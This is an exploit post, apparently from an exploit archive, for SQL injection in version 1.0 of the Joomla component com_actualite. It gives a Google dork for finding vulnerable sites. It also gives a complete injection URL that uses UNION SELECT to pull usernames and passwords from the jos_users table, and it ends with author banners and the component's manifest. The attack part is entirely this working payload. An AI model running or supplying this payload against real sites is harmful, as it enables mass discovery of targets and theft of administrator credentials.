The Joomla actualite component version 1.0 suffers from a SQL injection vulnerability.
6cf8bb6ee774f01f2baa05956b9075092088fb278a366b99219fe1328e06a260
##########################################
#
# Joomla Component com_actualite SQL Injection
#
##########################################
#
##AUTHOR : Stack-Terrorist [v40]
#
####HOME : http://v4-team.com
#
####MAiL : admin@v4-team.com
#
###########################################
#
# DORK 1 : allinurl: "com_actualite"
#
###########################################
EXPLOiT :
index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),password),3,4,5,6,7,8,9%20from%20jos_users/*
###########################################
-------------Stack-Terrorist--------------#
###########################################
------------admin@v4-team.com-------------#
###########################################
-------http://stack-terrorist.com---------#
###########################################
side note:
<name>actualite</name>
<creationDate>15/08/2006</creationDate>
<author>assiya</author>
<copyright></copyright>
<authorEmail>assiya@pyxicom.com</authorEmail>
<authorUrl>www.pyxicom.com</authorUrl>
<version>1.0</version>
<description>Composant pour la gestion des actualites de la CAF</description>